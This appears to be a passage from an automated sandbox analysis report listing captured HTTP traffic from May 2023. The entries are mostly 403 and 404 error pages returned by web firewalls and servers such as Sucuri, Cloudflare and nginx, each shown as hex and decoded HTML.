63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 63 66 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveDate: Wed, 31 May 2023 12:51:54 GMTCache-Control: no-storeCache-Control: no-cache, no-store, must-revalidateCache-Control: max-age=0X-Zen-Fury: 9a4dbcc14758e74b05df7671a88a284b13408a58X-Cache-Status: Server: ZENEDGEData Raw: 31 66 39 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 20 69 66 20 28 74 79 70 65 6f 66 28 5f 5f 5f 7a 65 6e 29 20 3d 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 73 65 74 54 69 6d 65 6f 75 74 28 61 72 67 75 6d 65 6e 74 73 2e 63 61 6c 6c 65 65 2c 20 35 30 29 3b 20 72 65 74 75 72 6e 3b 20 7d 5f 5f 5f 7a 65 6e 2e 68 69 63 28 22 5f 5f 5a 45 48 49 43 32 33 38 31 22 2c 20 31 36 38 35 35 33 37 34 37 36 2c 20 31 2c 20 30 2c 20 36 30 29 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 68 69 63 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 66 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 1f9<html><head><title>403 Forbidden</title><script type="text/javascript">(function(){ if (typeof(___zen) === "undefined") {setTimeout(arguments.callee, 50); return; }___zen.hic("__ZEHIC2381", 1685537476, 1, 0, 60); })()</script><script type="text/javascript" async="async" src="/__zenedge/assets/hic.js?v=1674207422"></script></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center><script type="text/javascript" async="async" src="/__zenedge/assets/f.js?v=1674207422"></script></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:54 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TxnvtTXAjVOWAFyrW5hN5SbV1azdqxvSFkUi7TSVuFVxs9C9umPDCnHnrtHT2GdVpkzFFQNkt2hiwHkOBqYYA%2Fi%2Bdkc%2FhtBoXIEA%2FGeKqkI2ErEQMPLn58C8In%2Bb%2FxmN"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7cff59d6efa39ba4-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 31 May 2023 12:51:53 GMTServer: ApacheLast-Modified: Tue, 13 Sep 2022 03:20:48 GMTAccept-Ranges: bytesContent-Length: 1260Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:54 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JHCx07MXQoFYcegx8BobsS0c%2FneLCEcqcpj6ygNWILLJ2F4CYRdRVPpfz6j%2F5n%2FD6x%2BxplsB9tCwUu29s9OpVBUDc4RvOUhs0JKWrapa1YDYk99DYzUpXwJNzwKRH8Cl"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7cff59d8f9e69ba4-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Wed, 31 May 2023 12:51:57 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15003X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: FBP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 63 66 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 31 May 2023 12:51:58 GMTContent-Type: text/htmlContent-Length: 125Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:58 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 31 May 2023 12:51:58 GMTContent-Type: text/htmlContent-Length: 2843Connection: keep-aliveVary: Accept-EncodingLast-Modified: Thu, 26 Jul 2018 17:13:08 GMTETag: "b1b-571ea1be9f445"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Wed, 31 May 2023 12:51:58 GMTserver: Apachecontent-length: 199content-type: text/html; charset=iso-8859-1x-server: coxkitch-svrData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 31 May 2023 12:51:59 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1561X-XSS-Protection: 0X-Frame-Options: SAMEORIGINData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:59 GMTServer: ApacheContent-Length: 199Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:59 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 